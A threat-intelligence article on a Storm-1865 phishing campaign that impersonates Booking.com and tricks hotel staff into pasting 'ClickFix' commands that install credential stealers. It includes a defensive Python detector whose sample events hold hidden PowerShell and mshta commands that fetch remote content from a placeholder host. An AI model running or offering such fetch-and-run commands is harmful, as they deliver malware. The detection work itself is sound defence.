If you are looking to plan a future vacation, take a minute to scrutinize hotel and travel service booking sites. Hotel and hostel workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking[.]com. In a phishing campaign that began in December 2024 and continued through February, the threat actors are targeting people in the hospitality industry across North America, Southeast Asia and Europe who are likely to work with Booking[.]com and to open emails from the travel platform. 
A report from Microsoft published on 13 March tracked a technique called “ClickFix” where hackers try to “take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features,” Microsoft said. “In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.” The researchers tied the campaign to the group Storm-1865, which has launched several other phishing campaigns that involve stealing payment data and making fraudulent charges.
The malicious emails included a variety of content, with some referencing bad guest reviews, account verification or demands from potential guests. Most of the emails include a link or a PDF attachment purportedly taking victims to Booking[.]com. When clicked, victims are taken to a fake CAPTCHA page where the ClickFix scheme is deployed. “This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard,” the researchers said, noting that from there malware is downloaded on victim devices.
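A detection check for the Run-dialog step described above, added here as an example that is not from the article or from Microsoft's report: a command pasted into Win+R is launched by explorer.exe, so the script interpreter's parent is explorer.exe rather than a terminal, IDE or scheduled task. The event field names and the sample events are constructed for this example.

```python
"""Score Windows process-creation events for the ClickFix pattern:
an interpreter spawned directly by explorer.exe (what a Run-dialog launch
looks like) whose command line carries a URL or window-hiding flags."""
import re

# Images a pasted Run-dialog command typically resolves to.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
# Command-line traits that are rare for a command a person types by hand.
URL_RE = re.compile(r"https?://", re.I)
HIDDEN_RE = re.compile(r"-(w|windowstyle)\s+hidden|-enc\S*|-nop\b", re.I)

# Constructed sample events (Sysmon Event ID 1 style); domains are placeholders.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "Invoke-WebRequest http://CONSTRUCTED.invalid/verify"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://CONSTRUCTED.invalid/captcha"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoLogo"},
]

def clickfix_score(event: dict) -> int:
    """Return 0 (no match) to 3; a score of 2 or more warrants triage."""
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return 0
    score = 1  # interpreter launched straight from the shell, as via Win+R
    if URL_RE.search(event["cmdline"]):
        score += 1  # pasted command fetches something remote
    if HIDDEN_RE.search(event["cmdline"]):
        score += 1  # tries to hide its window or obscure its payload
    return score

def triage(events):
    """Command lines from events that meet the triage threshold."""
    return [e["cmdline"] for e in events if clickfix_score(e) >= 2]

if __name__ == "__main__":
    for cmd in triage(EVENTS):
        print("ClickFix candidate:", cmd)
```

The same parent-process logic applies to entries left in the user's RunMRU registry key, which records commands typed or pasted into the Run dialog.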
Microsoft found several different strains of malware deployed on victim devices, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT. All of the malware strains allow the hackers to steal financial information and credentials.
A spokesperson for Booking[.]com said the “actual numbers of accommodations affected by this scam are a small fraction of those on our platform” and the company has made “significant investments to limit the impact” on their customers and partners. “While we can confirm that Booking[.]com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware,” the spokesperson said.
Microsoft noted that Storm-1865 targeted hotel guests in 2023 using another Booking.com lure, and in 2024 it attacked e-commerce customers with phishing messages. These campaigns have increased in volume since early 2023, Microsoft said.
The tech giant urged hospitality workers to always check a sender’s email address, to search for typos in emails and to be wary of any messages requiring them to take an action.
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com 